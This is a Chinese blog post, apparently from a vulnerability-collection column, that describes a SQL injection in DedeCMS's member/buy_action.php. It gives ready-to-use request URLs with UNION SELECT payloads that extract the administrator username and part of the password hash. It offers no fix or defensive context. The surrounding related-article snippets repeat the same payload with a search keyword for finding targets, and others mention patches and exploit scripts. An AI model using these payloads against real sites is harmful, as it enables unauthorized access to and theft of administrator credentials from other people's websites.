DedeCMS 支付页面注入漏洞

最新推荐文章于 2022-09-07 14:11:29 发布
最新推荐文章于 2022-09-07 14:11:29 发布
阅读量1.1k 收藏
点赞数
分类专栏: 漏洞收集 文章标签: sql 测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6587014
版权

发布日期:2011-03.23
发布作者:佚名

影响版本:dodecms.
官方网站:http://www.dedecms.com

漏洞类型:SQL注入

漏洞描述:DedeCMS. 织梦buy_action.php存在注入,可利用SQL查询代码爆管理员用户密码。

漏洞测试:

首先注册个用户,注册地址:
/member/index_do.php?fmdo=user&dopost=regnew

爆管理帐号:
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%20%23@__admin/*

爆管理员密码
/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,substring(pwd,9,16),4,5%20from%20%23@__admin/*

 

7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
支付FM插件(for DedeCMS)安装配置说明
stupidbp的博客
11-12 163
支持支付方式【后续会不断更新】: 签约通道:支付宝当面付,支付宝网站支付,微信支付Nativie; 免签通道:支付宝个人收款码,微信个人收款码 已安装的效果体验:http://dedecms.nnt.ltd 体验账号:demo888 体验密码:123456 该插件已发布码云:https://gitee.com/nephalem_cn_admin/zhifufm_plugin_dede release版本下载:https://gitee.com/nepha...
DedeCMS 存储型xss漏洞1
08-03
要利用此漏洞,攻击者需要能够访问并操作DedeCMS后台的“系统”->“支付工具”->“配送方式设置”,在那里他们可以添加一个新的配送方式,将XSS payload 输入到“简要说明”字段中。一旦数据保存到数据库,payload ...
织梦Dedecms buy_action.php SQL注入漏洞分析
深秋哋黎明的专栏
11-20 5623
Dedecms buy_action.php SQL注入漏洞分析 0x01 补丁对比 通过对比源码和2月25日补丁发现被改动的文件有三个,buy_action.php、uploadsafe.inc.php和sys_info.htm。 sys_info.htm只是添加了一个重置cfg_cookie_encode的代码,而且是静态文件,可以忽略掉。uploadsafe.inc.php
DedeCMS V5.7sp2最新版本parse_str函数SQL注入漏洞
网站安全专家
08-10 3803
织梦dedecms,在整个互联网中许多企业网站,个人网站,优化网站都在使用dede作为整个网站的开发架构,dedecms采用php+mysql数据库的架构来承载整个网站的运行与用户的访问,首页以及栏目页生成html静态化,大大的加快的网站访问速度,以及搜索引擎的友好度,利于百度蜘蛛的抓取,深受广大站长以及网站运营者的喜欢。最近我们发现dedecms漏洞,存在高危的parse_str函数sql注入漏...
Dedecms recommend.php SQL注入漏洞
网站守护中心
04-13 2146
Dedecms recommend.php SQL注入漏洞描述: 目标存在SQL注入漏洞。 1.SQL注入攻击就是攻击者通过欺骗数据库服务器执行非授权的任意查询过程。 - 收起 2.漏洞文件recommend.php,某处处理不当,导致绕过形成漏洞。 危害: 被SQL注入后可能导致以下后果: 1.网页被篡改 2.数据被篡改 -Dedecms recommend.php SQL注入
dedecms支付模块注入漏洞(alipay.php)
L_melody的博客
01-19 1880
文件:alipay.php 路径:.../include/payment/alipay.php 解决方案: 查找文件位置:/include/payment/alipay.php,大概在137行左右,找到: $order_sn = trim($_GET['out_trade_no']); 修改为: $order_sn = trim(addslashes($_GET['out_tr...
dedecms织梦支付模块注入漏洞导致SQL注入修复
09-07 403
阿里云提示:织梦dedecms支付模块注入漏洞导致SQL注入修复方法。打开/include/payment/alipay.php文件。
dedecms批量漏洞扫描.zip_dedecms_dedecms 扫描器_dedecms漏洞_dedecms路径扫描_批量扫描
07-13
dedecms批量漏洞扫描,大家可以自己试试效果
Dedecms_20150618_member_sqli (2).py
10-05
dedecms5.7sp1后台(要能够注册member的vip账户后台才可以)存在sql延时注入exp,用火狐得到账户登录的cookie替换,然后Python2.7跑脚本,from乌云雨神 http://www.hekaiyu.cn/hacker/3060.html
DEDE织梦支付插件
08-28
本接口为小叮当支付接口,支持支付宝扫码和微信扫码,即时到帐免签约 使用说明: 1、将以上文件传到网站根目录,有同名文件请覆盖 2、在浏览器访问:http://您的网站域名/XddpayInstall.php,点安装 3、注册一个小叮当支付帐号:https://www.xddpay.com,登录后台【API接口】,添加接口,添加成功后就有ID和密钥了。添加接口的参数如下 同步跳转网址: http://您的网站域名/plus/carbuyaction.php?dopost=return&code=XddpayAlipay 异步通知网址:http://您的网站域名/XddpayNotify.php 4、在DEDE后台【系统】->【支付工具】->【支付接口设置】可以看到安装的接口 6、分别点击上图后面的【更改】,设置好步骤3创建接口的【接口ID】和【接口密钥】。 7、已经成功啦! 点卡、会员、商品均可使用小叮当支付
wLHK-Dedecms漏洞整理.pdf
09-20
最后,我们可以看到Dedecms 5.7 /plus/recommend.php SQL 注入漏洞也存在于推荐页面中,攻击者可以通过构造特殊的输入来 inject恶意SQL语句,从而获取或修改数据库中的数据。 Dedecms漏洞整理报告中包含了多个漏洞...
/dede/plus_bshare.php,DEDE CMS 最新漏洞整理 - 接dedecms挂马防护、漏洞处理
weixin_33970994的博客
03-23 315
dedecms支付模块注入漏洞:引起的文件是/include/payment/alipay.php问题解决:找到:$order_sn = trim($_GET['out_trade_no']);将其修改为如下代码:$order_sn = trim(addslashes($_GET['out_trade_no']));-----------------------------------------...
阿里云安骑士dedecms漏洞 汇总
weixin_30481087的博客
12-05 206
原文地址 :http://www.yushitianxia.com/mianfei/mianfeijiaocheng/dedecms/36.html 阿里提示dedecms cookies泄漏导致SQL漏洞article_add.php的解决方法 漏洞名称:dedecms cookies泄漏导致SQL漏洞 补丁文件:/member/article_add.php 补丁来源:云盾自研 漏...
阿里云提示:织梦dedecms 支付模块注入漏洞导致SQL注入修复
zxy840552216的博客
07-09 167
阿里云提示:织梦dedecms 支付模块注入漏洞导致SQL注入修复方法。又是哪里有问题呢,文件在include/payment/下面include/payment/alipay.php文件,搜索(大概在137行的样子) 1 $order_sn = trim($_GET['out_trade_no']); 修改为 1 $order_sn = trim(addslashes($_GET['out_trade_no'])); 老规
DedeCMS注入爆管理员用户密码方法
weixin_30265171的博客
04-27 511
搜索关键词:powered by dedecms首先注册个用户,注册地址:/member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号:/member/buy_action.php?product=member&pid=1%20and%201=11%20union%20select%201,2,userid,4,5%20from%...
web 织梦cms 支付宝府支付功能实现办法
qq_37860926的博客
05-16 2042
CMS和支付功能的完美结合,配上DedeCMS健壮的模板功能为我们的站长DIY 自己的网站提供了强有力的支持,具有更大的灵活性和稳定的性能,为了让我们的站长能够尽快使用起我们的CMS系统,支付宝公司提供了 “支付宝单笔1.5%接口”免费签约,让您立刻体验网上交易。点击以下按钮,马上体验。 立刻申请 因支付宝账户认证升级,为了您能签约成功,请仔细阅读“操作指南” 具体操作: 第一步:如果您还没有支付...
dedecms注入爆管理员用户密码方法
K的博客
08-23 5753
dedecms注入爆管理员用户密码方法 2014年03月04日18:24 阅读: 1209 次 标签: dedecms注入爆管理员用户密码方法 关键词:powered by dedecms 首先注册个用户,注册地址: /member/index_do.php?fmdo=user&dopost=regnew 爆管理帐号: /member/buy_action.php?produ
dedecms sql注入漏洞
最新发布
06-28
Dedecms SQL注入漏洞是指在Dedecms系统中存在的一种安全漏洞,攻击者可以通过该漏洞向数据库中注入恶意代码,从而实现对网站的攻击和控制。该漏洞主要是由于Dedecms系统中的parse_str函数存在变量覆盖问题,攻击者可以通过构造恶意的参数来覆盖变量,从而注入恶意代码。此外,Dedecms系统中的mchStrCode函数也存在安全问题,攻击者可以通过编码绕过安全过滤,从而实现注入攻击。为了避免该漏洞的攻击,建议网站管理员及时升级Dedecms系统,并对用户输入的数据进行严格的安全过滤和验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值